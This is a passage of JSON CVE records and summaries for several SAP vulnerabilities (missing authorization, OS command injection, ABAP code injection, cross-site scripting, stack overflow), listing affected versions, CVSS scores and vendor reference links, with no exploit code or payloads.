"tags": [
"x_refsource_MISC"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=571343107"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cna@sap.com",
"ID": "CVE-2021-21481",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "SAP NetWeaver AS JAVA (MigrationService)",
"version": {
"version_data": [
{
"version_name": "\u003c",
"version_value": "7.10"
},
{
"version_name": "\u003c",
"version_value": "7.11"
},
{
"version_name": "\u003c",
"version_value": "7.30"
},
{
"version_name": "\u003c",
"version_value": "7.31"
},
{
"version_name": "\u003c",
"version_value": "7.40"
},
{
"version_name": "\u003c",
"version_value": "7.50"
}
]
}
}
]
},
"vendor_name": "SAP SE"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The MigrationService, which is part of SAP NetWeaver versions 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50, does not perform an authorization check. This might allow an unauthorized attacker to access configuration objects, including such that grant administrative privileges. This could result in complete compromise of system confidentiality, integrity, and availability."
}
]
},
"impact": {
"cvss": {
"baseScore": "9.6",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Missing Authorization"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://launchpad.support.sap.com/#/notes/3022422",
"refsource": "MISC",
"url": "https://launchpad.support.sap.com/#/notes/3022422"
},
{
"name": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=571343107",
"refsource": "MISC",
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=571343107"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"assignerShortName": "sap",
"cveId": "CVE-2021-21481",
"datePublished": "2021-03-09T14:05:51",
"dateReserved": "2020-12-30T00:00:00",
"dateUpdated": "2024-08-03T18:16:22.540Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2023-36922
Vulnerability from cvelistv5
Published
2023-07-11 02:56
Modified
2024-08-02 17:01
Severity ?
EPSS score ?
Summary
Due to programming error in function module and report, IS-OIL component in SAP ECC and SAP S/4HANA allows an authenticated attacker to inject an arbitrary operating system command into an unprotected parameter in a common (default) extension. On successful exploitation, the attacker can read or modify the system data as well as shut down the system.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| ▼ | SAP_SE | SAP ECC and SAP S/4HANA (IS-OIL) |
Version: IS-OIL 600 Version: IS-OIL 602 Version: IS-OIL 603 Version: IS-OIL 604 Version: IS-OIL 605 Version: IS-OIL 606 Version: IS-OIL 617 Version: IS-OIL 618 Version: IS-OIL 800 Version: IS-OIL 802 Version: IS-OIL 803 Version: IS-OIL 804 Version: IS-OIL 805 Version: IS-OIL 806 Version: IS-OIL 807 |
|
|
|||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T17:01:09.981Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://me.sap.com/notes/3350297"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "SAP ECC and SAP S/4HANA (IS-OIL)",
"vendor": "SAP_SE",
"versions": [
{
"status": "affected",
"version": "IS-OIL 600"
},
{
"status": "affected",
"version": "IS-OIL 602"
},
{
"status": "affected",
"version": "IS-OIL 603"
},
{
"status": "affected",
"version": "IS-OIL 604"
},
{
"status": "affected",
"version": "IS-OIL 605"
},
{
"status": "affected",
"version": "IS-OIL 606"
},
{
"status": "affected",
"version": "IS-OIL 617"
},
{
"status": "affected",
"version": "IS-OIL 618"
},
{
"status": "affected",
"version": "IS-OIL 800"
},
{
"status": "affected",
"version": "IS-OIL 802"
},
{
"status": "affected",
"version": "IS-OIL 803"
},
{
"status": "affected",
"version": "IS-OIL 804"
},
{
"status": "affected",
"version": "IS-OIL 805"
},
{
"status": "affected",
"version": "IS-OIL 806"
},
{
"status": "affected",
"version": "IS-OIL 807"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eDue to programming error in function module and report, IS-OIL component in SAP ECC and SAP S/4HANA allows an authenticated attacker to inject an arbitrary operating system command into an unprotected parameter in a common (default) extension. \u0026nbsp;On successful exploitation, the attacker can read or modify the system data as well as shut down the system.\u003c/span\u003e\u003c/p\u003e"
}
],
"value": "Due to programming error in function module and report, IS-OIL component in SAP ECC and SAP S/4HANA allows an authenticated attacker to inject an arbitrary operating system command into an unprotected parameter in a common (default) extension. \u00a0On successful exploitation, the attacker can read or modify the system data as well as shut down the system.\n\n"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"lang": "eng",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-12-09T16:39:50.007Z",
"orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"shortName": "sap"
},
"references": [
{
"url": "https://me.sap.com/notes/3350297"
},
{
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "OS command injection vulnerability in SAP ECC and SAP S/4HANA (IS-OIL)",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"assignerShortName": "sap",
"cveId": "CVE-2023-36922",
"datePublished": "2023-07-11T02:56:55.299Z",
"dateReserved": "2023-06-27T21:23:26.299Z",
"dateUpdated": "2024-08-02T17:01:09.981Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2013-3243
Vulnerability from cvelistv5
Published
2013-10-28 22:00
Modified
2024-08-06 16:00
Severity ?
EPSS score ?
Summary
Unspecified vulnerability in OpenText/IXOS ECM for SAP NetWeaver allows remote attackers to execute arbitrary ABAP code via unknown vectors.
References
| ▼ | URL | Tags |
|---|---|---|
| http://archives.neohapsis.com/archives/bugtraq/2013-04/0214.html | mailing-list, x_refsource_BUGTRAQ | |
| http://www.esnc.de/sap-security-audit-and-scan-services/security-advisories/57-esnc-2013-004-remote-abap-code-injection-in-opentext-ixos-ecm-suite-for-sap-netweaver.html | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T16:00:10.116Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20130424 [ESNC-2013-004] Remote ABAP Code Injection in OpenText/IXOS ECM for SAP NetWeaver",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://archives.neohapsis.com/archives/bugtraq/2013-04/0214.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.esnc.de/sap-security-audit-and-scan-services/security-advisories/57-esnc-2013-004-remote-abap-code-injection-in-opentext-ixos-ecm-suite-for-sap-netweaver.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2013-04-24T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Unspecified vulnerability in OpenText/IXOS ECM for SAP NetWeaver allows remote attackers to execute arbitrary ABAP code via unknown vectors."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2013-11-19T10:00:00",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20130424 [ESNC-2013-004] Remote ABAP Code Injection in OpenText/IXOS ECM for SAP NetWeaver",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://archives.neohapsis.com/archives/bugtraq/2013-04/0214.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.esnc.de/sap-security-audit-and-scan-services/security-advisories/57-esnc-2013-004-remote-abap-code-injection-in-opentext-ixos-ecm-suite-for-sap-netweaver.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-3243",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Unspecified vulnerability in OpenText/IXOS ECM for SAP NetWeaver allows remote attackers to execute arbitrary ABAP code via unknown vectors."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20130424 [ESNC-2013-004] Remote ABAP Code Injection in OpenText/IXOS ECM for SAP NetWeaver",
"refsource": "BUGTRAQ",
"url": "http://archives.neohapsis.com/archives/bugtraq/2013-04/0214.html"
},
{
"name": "http://www.esnc.de/sap-security-audit-and-scan-services/security-advisories/57-esnc-2013-004-remote-abap-code-injection-in-opentext-ixos-ecm-suite-for-sap-netweaver.html",
"refsource": "MISC",
"url": "http://www.esnc.de/sap-security-audit-and-scan-services/security-advisories/57-esnc-2013-004-remote-abap-code-injection-in-opentext-ixos-ecm-suite-for-sap-netweaver.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-3243",
"datePublished": "2013-10-28T22:00:00",
"dateReserved": "2013-04-22T00:00:00",
"dateUpdated": "2024-08-06T16:00:10.116Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2011-4707
Vulnerability from cvelistv5
Published
2011-12-08 19:00
Modified
2024-08-07 00:16
Severity ?
EPSS score ?
Summary
Multiple cross-site scripting (XSS) vulnerabilities in the Virus Scan Interface in SAP Netweaver allow remote attackers to inject arbitrary web script or HTML via the (1) instname parameter to the VsiTestScan servlet and (2) name parameter to the VsiTestServlet servlet.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securityfocus.com/archive/1/520554/100/0/threaded | mailing-list, x_refsource_BUGTRAQ | |
| http://dsecrg.com/pages/vul/show.php?id=336 | x_refsource_MISC | |
| http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a | x_refsource_CONFIRM | |
| https://erpscan.io/advisories/dsecrg-11-036-sap-netwaver-virus-scan-interface-multiple-xss/ | x_refsource_MISC | |
| https://service.sap.com/sap/support/notes/1546307 | x_refsource_CONFIRM |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T00:16:34.390Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20111117 [DSECRG-11-036] SAP NetWaver Virus Scan Interface - multiple XSS",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/520554/100/0/threaded"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://dsecrg.com/pages/vul/show.php?id=336"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/advisories/dsecrg-11-036-sap-netwaver-virus-scan-interface-multiple-xss/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://service.sap.com/sap/support/notes/1546307"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2011-11-17T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in the Virus Scan Interface in SAP Netweaver allow remote attackers to inject arbitrary web script or HTML via the (1) instname parameter to the VsiTestScan servlet and (2) name parameter to the VsiTestServlet servlet."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-12-10T17:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20111117 [DSECRG-11-036] SAP NetWaver Virus Scan Interface - multiple XSS",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/520554/100/0/threaded"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://dsecrg.com/pages/vul/show.php?id=336"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/advisories/dsecrg-11-036-sap-netwaver-virus-scan-interface-multiple-xss/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://service.sap.com/sap/support/notes/1546307"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2011-4707",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in the Virus Scan Interface in SAP Netweaver allow remote attackers to inject arbitrary web script or HTML via the (1) instname parameter to the VsiTestScan servlet and (2) name parameter to the VsiTestServlet servlet."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20111117 [DSECRG-11-036] SAP NetWaver Virus Scan Interface - multiple XSS",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/520554/100/0/threaded"
},
{
"name": "http://dsecrg.com/pages/vul/show.php?id=336",
"refsource": "MISC",
"url": "http://dsecrg.com/pages/vul/show.php?id=336"
},
{
"name": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a",
"refsource": "CONFIRM",
"url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a"
},
{
"name": "https://erpscan.io/advisories/dsecrg-11-036-sap-netwaver-virus-scan-interface-multiple-xss/",
"refsource": "MISC",
"url": "https://erpscan.io/advisories/dsecrg-11-036-sap-netwaver-virus-scan-interface-multiple-xss/"
},
{
"name": "https://service.sap.com/sap/support/notes/1546307",
"refsource": "CONFIRM",
"url": "https://service.sap.com/sap/support/notes/1546307"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2011-4707",
"datePublished": "2011-12-08T19:00:00",
"dateReserved": "2011-12-08T00:00:00",
"dateUpdated": "2024-08-07T00:16:34.390Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2022-28772
Vulnerability from cvelistv5
Published
2022-04-12 16:11
Modified
2024-08-03 06:03
Severity ?
EPSS score ?
Summary
By overlong input values an attacker may force overwrite of the internal program stack in SAP Web Dispatcher - versions 7.53, 7.77, 7.81, 7.85, 7.86, or Internet Communication Manager - versions KRNL64NUC 7.22, 7.22EXT, 7.49, KRNL64UC 7.22, 7.22EXT, 7.49, 7.53, KERNEL 7.22, 7.49, 7.53, 7.77, 7.81, 7.85, 7.86, which makes these programs unavailable, leading to denial of service.
References
| ▼ | URL | Tags |
|---|---|---|
| https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html | x_refsource_MISC | |
| https://launchpad.support.sap.com/#/notes/3111311 | x_refsource_MISC |
Impacted products
| Vendor | Product | Version | |||||
|---|---|---|---|---|---|---|---|
| ▼ | SAP SE | SAP NetWeaver (Internet Communication Manager) |
Version: KRNL64NUC 7.22 Version: 7.22EXT Version: 7.49 Version: KRNL64UC 7.22 Version: 7.53 Version: KERNEL 7.22 Version: 7.77 Version: 7.81 Version: 7.85 Version: 7.86 |
||||
|
|||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T06:03:52.584Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://launchpad.support.sap.com/#/notes/3111311"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "SAP NetWeaver (Internet Communication Manager)",
"vendor": "SAP SE",
"versions": [
{
"status": "affected",
"version": "KRNL64NUC 7.22"
},
{
"status": "affected",
"version": "7.22EXT"
},
{
"status": "affected",
"version": "7.49"
},
{
"status": "affected",
"version": "KRNL64UC 7.22"
},
{
"status": "affected",
"version": "7.53"
},
{
"status": "affected",
"version": "KERNEL 7.22"
},
{
"status": "affected",
"version": "7.77"
},
{
"status": "affected",
"version": "7.81"
},
{
"status": "affected",
"version": "7.85"
},
{
"status": "affected",
"version": "7.86"
}
]
},
{
"product": "SAP Web Dispatcher",
"vendor": "SAP SE",
"versions": [
{
"status": "affected",
"version": "7.53"
},
{
"status": "affected",
"version": "7.77"
},
{
"status": "affected",
"version": "7.81"
},
{
"status": "affected",
"version": "7.85"
},
{
"status": "affected",
"version": "7.86"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "By overlong input values an attacker may force overwrite of the internal program stack in SAP Web Dispatcher - versions 7.53, 7.77, 7.81, 7.85, 7.86, or Internet Communication Manager - versions KRNL64NUC 7.22, 7.22EXT, 7.49, KRNL64UC 7.22, 7.22EXT, 7.49, 7.53, KERNEL 7.22, 7.49, 7.53, 7.77, 7.81, 7.85, 7.86, which makes these programs unavailable, leading to denial of service."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-121",
"description": "CWE-121",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-04-12T16:11:32",
"orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"shortName": "sap"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://launchpad.support.sap.com/#/notes/3111311"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cna@sap.com",
"ID": "CVE-2022-28772",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "SAP NetWeaver (Internet Communication Manager)",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "KRNL64NUC 7.22"
},
{
"version_affected": "=",
"version_value": "7.22EXT"
},
{
"version_affected": "=",
"version_value": "7.49"
},
{
"version_affected": "=",
"version_value": "KRNL64UC 7.22"
},
{
"version_affected": "=",
"version_value": "7.22EXT"
},
{
"version_affected": "=",
"version_value": "7.49"
},
{
"version_affected": "=",
"version_value": "7.53"
},
{
"version_affected": "=",
"version_value": "KERNEL 7.22"
},
{
"version_affected": "=",
"version_value": "7.49"
},
{
"version_affected": "=",
"version_value": "7.53"
},
{
"version_affected": "=",
"version_value": "7.77"
},
{
"version_affected": "=",
"version_value": "7.81"
},
{
"version_affected": "=",
"version_value": "7.85"
},
{
"version_affected": "=",
"version_value": "7.86"
}
]
}
},
{
"product_name": "SAP Web Dispatcher",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "7.53"
},
{
"version_affected": "=",
"version_value": "7.77"
},
{
"version_affected": "=",
"version_value": "7.81"
},
{
"version_affected": "=",
"version_value": "7.85"
},
{
"version_affected": "=",
"version_value": "7.86"
}
]
}
}
]
},
"vendor_name": "SAP SE"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "By overlong input values an attacker may force overwrite of the internal program stack in SAP Web Dispatcher - versions 7.53, 7.77, 7.81, 7.85, 7.86, or Internet Communication Manager - versions KRNL64NUC 7.22, 7.22EXT, 7.49, KRNL64UC 7.22, 7.22EXT, 7.49, 7.53, KERNEL 7.22, 7.49, 7.53, 7.77, 7.81, 7.85, 7.86, which makes these programs unavailable, leading to denial of service."
}
]
},
"impact": {
"cvss": {
"baseScore": "null",
"vectorString": "null",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-121"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html",
"refsource": "MISC",
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
},
{
"name": "https://launchpad.support.sap.com/#/notes/3111311",
"refsource": "MISC",
"url": "https://launchpad.support.sap.com/#/notes/3111311"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"assignerShortName": "sap",
"cveId": "CVE-2022-28772",
"datePublished": "2022-04-12T16:11:32",
"dateReserved": "2022-04-06T00:00:00",
"dateUpdated": "2024-08-03T06:03:52.584Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2013-6819
Vulnerability from cvelistv5
Published
2013-11-19 19:00
Modified
2024-08-06 17:46
Severity ?
EPSS score ?
Summary
Cross-site scripting (XSS) vulnerability in Performance Provider in SAP NetWeaver allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
References
| ▼ | URL | Tags |
|---|---|---|
| https://service.sap.com/sap/support/notes/1784894 | x_refsource_CONFIRM | |
| https://erpscan.io/advisories/dsecrg-13-006-sap-netweaver-performance-provider-xss/ | x_refsource_MISC | |
| http://scn.sap.com/docs/DOC-8218 | x_refsource_CONFIRM |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T17:46:23.451Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://service.sap.com/sap/support/notes/1784894"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/advisories/dsecrg-13-006-sap-netweaver-performance-provider-xss/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://scn.sap.com/docs/DOC-8218"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2013-03-19T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Cross-site scripting (XSS) vulnerability in Performance Provider in SAP NetWeaver allows remote attackers to inject arbitrary web script or HTML via unspecified vectors."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-12-10T17:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://service.sap.com/sap/support/notes/1784894"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/advisories/dsecrg-13-006-sap-netweaver-performance-provider-xss/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://scn.sap.com/docs/DOC-8218"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-6819",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Cross-site scripting (XSS) vulnerability in Performance Provider in SAP NetWeaver allows remote attackers to inject arbitrary web script or HTML via unspecified vectors."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://service.sap.com/sap/support/notes/1784894",
"refsource": "CONFIRM",
"url": "https://service.sap.com/sap/support/notes/1784894"
},
{
"name": "https://erpscan.io/advisories/dsecrg-13-006-sap-netweaver-performance-provider-xss/",
"refsource": "MISC",
"url": "https://erpscan.io/advisories/dsecrg-13-006-sap-netweaver-performance-provider-xss/"
},
{
"name": "http://scn.sap.com/docs/DOC-8218",
"refsource": "CONFIRM",
"url": "http://scn.sap.com/docs/DOC-8218"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-6819",
"datePublished": "2013-11-19T19:00:00",
"dateReserved": "2013-11-19T00:00:00",
"dateUpdated": "2024-08-06T17:46:23.451Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2022-22534
Vulnerability from cvelistv5
Published
2022-02-09 22:05
Modified
2024-08-03 03:14
Severity ?
EPSS score ?
Summary
Due to insufficient encoding of user input, SAP NetWeaver allows an unauthenticated attacker to inject code that may expose sensitive data like user ID and password. These endpoints are normally exposed over the network and successful exploitation can partially impact confidentiality of the application.
References
| ▼ | URL | Tags |
|---|---|---|
| https://launchpad.support.sap.com/#/notes/3124994 | x_refsource_MISC | |
| https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html | x_refsource_MISC |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| ▼ | SAP SE | SAP NetWeaver (ABAP and Java application Servers) |
Version: 700 Version: 701 Version: 702 Version: 731 Version: 740 Version: 750 Version: 751 Version: 752 Version: 753 Version: 754 Version: 755 Version: 756 |
|
|
|||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T03:14:55.475Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://launchpad.support.sap.com/#/notes/3124994"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "SAP NetWeaver (ABAP and Java application Servers)",
"vendor": "SAP SE",
"versions": [
{
"status": "affected",
"version": "700"
},
{
"status": "affected",
"version": "701"
},
{
"status": "affected",
"version": "702"
},
{
"status": "affected",
"version": "731"
},
{
"status": "affected",
"version": "740"
},
{
"status": "affected",
"version": "750"
},
{
"status": "affected",
"version": "751"
},
{
"status": "affected",
"version": "752"
},
{
"status": "affected",
"version": "753"
},
{
"status": "affected",
"version": "754"
},
{
"status": "affected",
"version": "755"
},
{
"status": "affected",
"version": "756"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Due to insufficient encoding of user input, SAP NetWeaver allows an unauthenticated attacker to inject code that may expose sensitive data like user ID and password. These endpoints are normally exposed over the network and successful exploitation can partially impact confidentiality of the application."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Cross-Site Scripting",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-08-24T15:18:07",
"orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
